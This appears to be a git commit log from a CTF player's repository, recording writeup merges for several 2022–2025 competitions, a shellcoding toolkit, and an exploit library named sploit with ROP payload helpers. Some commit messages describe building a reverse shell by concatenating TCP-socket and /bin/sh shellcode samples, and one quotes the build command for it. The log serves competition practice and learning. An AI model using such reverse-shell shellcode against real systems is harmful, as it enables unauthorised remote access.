| Age | Commit message (Collapse) | Author | Files | Lines |
|---|
|
* malf-amateursctf-2025:
Writeup AmateursCTF 2025 / Easy heap
Writeup AmateursCTF 2025 / Rewrite it in Zig
Add link to online Java decompiler
AmateursCTF 2025 results
|
|
Signed-off-by: Matt Hunter <m@lfurio.us>
|
|
Signed-off-by: Matt Hunter <m@lfurio.us>
|
|
Signed-off-by: Matt Hunter <m@lfurio.us>
|
|
Signed-off-by: Matt Hunter <m@lfurio.us>
|
|
Signed-off-by: Matt Hunter <m@lfurio.us>
|
|
* malf-braekerctf-2024:
Writeup BraekerCTF 2024 / e
Writeup BraekerCTF 2024 / Eye Doctor
Add image convolution topic doc
Add x86 loop instruction callout
Merge x86 tips into architecture topic doc
BraekerCTF 2024 results
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
* malf-lactf-2024:
Update docker guide
x86 register correction
lactf 2024 results
|
|
The docker reference guide now better explains various common
situations. The file is moved to docs/nix since docker is not strictly
a web technology. This location makes more sense.
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
* malf-bitsctf-2024:
RSA link to factordb
Consolidate forensics links and add FTKImager and volatility
BITSCTF 2024 results
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Intended to provide a base environment for working with binary
exploitation challenges and enable process isolation of said binaries.
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Sploit has been living on in another repository for the past year or so.
Remove the stale files from this repository.
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
* malf-lactf-2023:
Writeup LACTF 2023 / Switcheroo
Writeup LACTF 2023 / CTFd plus
Writeup LACTF 2023 / A hacker's notes
Writeup LACTF 2023 / One more time pad
lactf 2023 results
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Adds a reverse shell and other improvements for correctness, along with
a general cleanup of the files.
* shellcoding-enhancements:
Ignore shellcode working files
shellcode: Add sample for connecting a TCP socket
shellcode: Update /bin/sh shellcodes
shellcode: Remove shelltool
shellcode: Update Makefile
shellcode: Move example code to a new directory
shellcode: Drop SYS_EXIT samples
|
|
* malf-xmas-2022:
Writeup X-MAS CTF 2022 / Krampus Greetings
Writeup X-MAS CTF 2022 / Santas Complaint Hotline
X-MAS CTF 2022 results
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
This sample can be used to create a reverse shell when combined with the
shell64 sample:
cat examples/{tcp64,shell64}.asm >code.asm
make
...
Signed-off-by: Malfurious <m@lfurio.us>
|
|
The shell-spawning shellcodes are rewritten to address the following
concerns:
- The array parameters to execve are now set properly, to valid
arrays on the stack, instead of NULL pointers.
- The cdq instruction is no longer used to sign-extend the rax
register, since it has not been producing the expected results in
gdb.
- Labels, sections, and other file metadata are removed in order to
support concatenation of shellcode samples to make more complex
code.
Signed-off-by: Malfurious <m@lfurio.us>
|
|
shelltool is now deprecated, made redundant by the updated Makefile.
Signed-off-by: Malfurious <m@lfurio.us>
|
|
This patch brings various improvements to the shellcoding experience:
- There is no longer a hardcoded assembly sample that gets built
Although the default was pretty sane, it will be more convenient
to experiment, or build more complex shellcodes using a new
untracked filename as the main build target: code.asm
If code.asm is missing, then as before, it will be created from
shell64.asm (the old hard default).
The Makefile targets will compile code.* files.
- Hex string generation and bad char detection are improved
grep is used to highlight detected bad chars right in place.
This entire feature is now implemented directly in the Makefile
using a couple command lines, making shelltool deprecated.
- Builtin disassembly
Just run 'make disas' instead of manually invoking objdump. The
output is also filtered through grep for bad char detection.
- ELF executable is optional
Rather than linking an executable all the time, just run
'make elf' when you need it.
Signed-off-by: Malfurious <m@lfurio.us>
|
|
This is mainly done to keep the top working directory (where the
Makefile lives) cleaner.
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
Signed-off-by: Malfurious <m@lfurio.us>
|
|
This branch brings some conveniences to the semantics behind Symtbl base
values.
* sploit/symtbl-base:
sploit: rev: Properly base Symtbls for non-PIC binaries
sploit: Fix bugs involving Symtbl base value
sploit: mem: Allow Symtbl base to be modified
|
|
This branch provides some payload-specific upgrades that have come out
of the development so far on the automated ROP chain builder.
* sploit/payload-rop-prep:
sploit: payload: Promote private methods to "protected" access
sploit: payload: Clean up automatic symbol naming
sploit: payload: Class no longer extends Symtbl
sploit: payload: Allow variadic insertions
|
|
The baddr property identified by r2 is now used as the base address for
ELF symbol tables. This should not change the addresses retrieved via
the table normally, however should fix the internal offsets of the table
so that rebasing makes sense.
Note that for PIC/PIE binaries we would already get a Symtbl with
'correct' offsets, as r2 is unable to absolutely resolve them for us.
In these cases, the Symtbl base value remains at zero.
Signed-off-by: Malfurious <m@lfurio.us>
Signed-off-by: dusoleil <howcansocksbereal@gmail.com>
|
|
Some code previously assumed a Symtbl's base value to always be zero.
This was often the case, however the assumption would break (for example)
when attempting to rebase() a mapped Symtbl.
As of the previous patch enabling freer modification of base, the
potentiality of these bugs will be higher.
Signed-off-by: Malfurious <m@lfurio.us>
Signed-off-by: dusoleil <howcansocksbereal@gmail.com>
|
|
Allow a Symtbl's base to be modified in-place, without mapping into a
new object. This is useful when working with the Symtbl aspect of a
Payload.
This includes setting a non-zero base on construction. As usual, when
defining base on construction, any additional kwargs symbols are
interpreted relative to the given base. The order of arguments does not
matter.
Signed-off-by: Malfurious <m@lfurio.us>
Signed-off-by: dusoleil <howcansocksbereal@gmail.com>
|
